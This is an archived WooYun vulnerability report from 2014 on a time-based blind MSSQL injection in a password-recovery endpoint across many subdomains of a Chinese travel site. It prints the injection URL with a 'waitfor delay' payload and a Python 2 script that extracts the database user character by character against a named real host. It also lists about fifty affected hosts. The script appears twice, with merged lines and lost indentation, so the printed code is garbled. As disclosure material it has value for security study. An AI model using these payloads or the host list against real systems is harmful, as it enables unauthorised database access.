同程旅游网多个站点同类MSSQL注射(附验证脚本)

发表于 2014年12月26日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2014-088834

漏洞标题：同程旅游网多个站点同类MSSQL注射(附验证脚本)

相关厂商：苏州同程旅游网络科技有限公司

漏洞作者：lijiejie

提交时间：2014-12-26 20:28

公开时间：2015-02-09 20:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签：

漏洞详情

披露状态：

2014-12-26: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认，细节仅向厂商公开
2015-01-05: 细节向核心白帽子及相关领域专家公开
2015-01-15: 细节向普通白帽子公开
2015-01-25: 细节向实习白帽子公开
2015-02-09: 细节向公众公开

简要描述：

同程旅游网多站点同类MSSQL注射(附验证脚本)

详细说明：

注入点：

http://17349886.17ujp.com/Admin/AjaxForFindPwd.aspx?IsReseller=0&_=1419585952016&Account=123'; if (len(system_user)=10) waitfor delay '0:0:10'--

1	http://17349886.17ujp.com/Admin/AjaxForFindPwd.aspx?IsReseller=0&_=1419585952016&Account=123'; if (len(system_user)=10) waitfor delay '0:0:10'--

以上是猜解system_user长度为10

漏洞证明：

逐字符猜解system_user，得到：

17ujpadmin

1	17ujpadmin

验证脚本：

#encoding=gbk<br>
import httplib<br>
import time<br>
import string<br>
import sys<br>
import random<br>
import urllibheaders = {<br>
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',<br>
}payloads = list(string.ascii_lowercase)<br>
for i in range(0,10):<br>
    payloads.append(str(i))<br>
payloads += ['@','_', '.', '-', '\\', ' ']print 'Try to retrive user:'<br>
user = ''<br>
for i in range(1,11):<br>
    for payload in payloads:<br>
        try:<br>
            conn = httplib.HTTPConnection('17349886.17ujp.com', timeout=3)<br>
            s = "if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:3' --" % (i, ord(payload))<br>
            params = "IsReseller=0&_=1419585952016&Account=123';" + urllib.quote(s)<br>
            conn.request(method='GET', url= '/Admin/AjaxForFindPwd.aspx?' + params,<br>
                         headers = headers)<br>
            html_doc = conn.getresponse().read()<br>
            conn.close()<br>
            print '.',<br>
        except Exception, e:<br>
            user += payload<br>
            print '\nIn progress]', user<br>
            breakprint '\n[Done] User is:', user

#encoding=gbk

import httplib

import time

import string

import sys

import random

import urllibheaders = {

'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',

}payloads = list(string.ascii_lowercase)

for i in range(0,10):

payloads.append(str(i))

payloads += ['@','_', '.', '-', '\\', ' ']print 'Try to retrive user:'

user = ''

for i in range(1,11):

for payload in payloads:

try:

conn = httplib.HTTPConnection('17349886.17ujp.com', timeout=3)

s = "if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:3' --" % (i, ord(payload))

params = "IsReseller=0&_=1419585952016&Account=123';" + urllib.quote(s)

conn.request(method='GET', url= '/Admin/AjaxForFindPwd.aspx?' + params,

headers = headers)

html_doc = conn.getresponse().read()

conn.close()

print '.',

except Exception, e:

user += payload

print '\nIn progress]', user

breakprint '\n[Done] User is:', user

应该是域名泛解析，发现多个站点都存在该注射：

http://18377290.17ujp.com<br>
http://35369309.ctt.17ujp.com<br>
http://19871649.17ujp.com<br>
http://35369309.ct.17ujp.com<br>
http://1534423.17ujp.com<br>
http://33365104.ct.17ujp.com<br>
http://14479454.17ujp.com<br>
http://1134230.17ujp.com<br>
http://1184097.17ujp.com<br>
http://1393336.17ujp.com<br>
http://1334783.17ujp.com<br>
http://36403811.17ujp.com<br>
http://1190222.17ujp.com<br>
http://95241.17ujp.com<br>
http://35369309.17ujp.com<br>
http://33365104.17ujp.com<br>
http://1702437.ctt.17ujp.com<br>
http://1578794.17ujp.com<br>
http://8446.17ujp.com<br>
http://16687718.17ujp.com<br>
http://1381187.17ujp.com<br>
http://1191850.17ujp.com<br>
http://1196320.17ujp.com<br>
http://9938.17ujp.com<br>
http://66405.17ujp.com<br>
http://1191850.ct.17ujp.com<br>
http://17349886.17ujp.com<br>
http://1191850.ctt.17ujp.com<br>
http://2340837.17ujp.com<br>
http://1191850.cnc.17ujp.com<br>
http://4045321.17ujp.com<br>
http://9938.ctt.17ujp.com<br>
http://39100370.17ujp.com<br>
http://9938.cnc.17ujp.com<br>
http://1186224.17ujp.com<br>
http://9938.ct.17ujp.com<br>
http://1373099.17ujp.com<br>
http://980655.17ujp.com<br>
http://1792227.ct.17ujp.com<br>
http://1702437.17ujp.com<br>
http://1792227.ctt.17ujp.com<br>
http://1186435.17ujp.com<br>
http://1792227.cnc.17ujp.com<br>
http://1702437.ct.17ujp.com<br>
http://26751655.ctt.17ujp.com<br>
http://1702437.cnc.17ujp.com<br>
http://26751655.ct.17ujp.com<br>
http://1157668.17ujp.com<br>
http://26751655.cnc.17ujp.com<br>
http://1539098.17ujp.com<br>
http://10873993.ctt.17ujp.com

http://18377290.17ujp.com

http://35369309.ctt.17ujp.com

http://19871649.17ujp.com

http://35369309.ct.17ujp.com

http://1534423.17ujp.com

http://33365104.ct.17ujp.com

http://14479454.17ujp.com

http://1134230.17ujp.com

http://1184097.17ujp.com

http://1393336.17ujp.com

http://1334783.17ujp.com

http://36403811.17ujp.com

http://1190222.17ujp.com

http://95241.17ujp.com

http://35369309.17ujp.com

http://33365104.17ujp.com

http://1702437.ctt.17ujp.com

http://1578794.17ujp.com

http://8446.17ujp.com

http://16687718.17ujp.com

http://1381187.17ujp.com

http://1191850.17ujp.com

http://1196320.17ujp.com

http://9938.17ujp.com

http://66405.17ujp.com

http://1191850.ct.17ujp.com

http://17349886.17ujp.com

http://1191850.ctt.17ujp.com

http://2340837.17ujp.com

http://1191850.cnc.17ujp.com

http://4045321.17ujp.com

http://9938.ctt.17ujp.com

http://39100370.17ujp.com

http://9938.cnc.17ujp.com

http://1186224.17ujp.com

http://9938.ct.17ujp.com

http://1373099.17ujp.com

http://980655.17ujp.com

http://1792227.ct.17ujp.com

http://1702437.17ujp.com

http://1792227.ctt.17ujp.com

http://1186435.17ujp.com

http://1792227.cnc.17ujp.com

http://1702437.ct.17ujp.com

http://26751655.ctt.17ujp.com

http://1702437.cnc.17ujp.com

http://26751655.ct.17ujp.com

http://1157668.17ujp.com

http://26751655.cnc.17ujp.com

http://1539098.17ujp.com

http://10873993.ctt.17ujp.com

修复方案：

过滤

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-12-2620:55

厂商回复：

感谢关注同程旅游，已在安排修复，谢谢李姐姐。

评价

2010-01-01 00:00 CoffeeSafe 白帽子 | Rank:76 漏洞数:9)

前排！
2010-01-01 00:00 疯子白帽子 | Rank:254 漏洞数:39)

前排！
2010-01-01 00:00 http://www.wooyun.org/corps/途牛旅游网白帽子 | Rank:0 漏洞数:0)

放开他，冲我来！
2010-01-01 00:00 0x_Jin 白帽子 | Rank:234 漏洞数:25)

李姐姐你又来了
2010-01-01 00:00 wefgod 白帽子 | Rank:1438 漏洞数:124)

李姐姐就是厉害
2010-01-01 00:00 帅气小狼狗白帽子 | Rank:8 漏洞数:1)

@途牛旅游网你们是基友吗？

原文连接：同程旅游网多个站点同类MSSQL注射(附验证脚本) 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。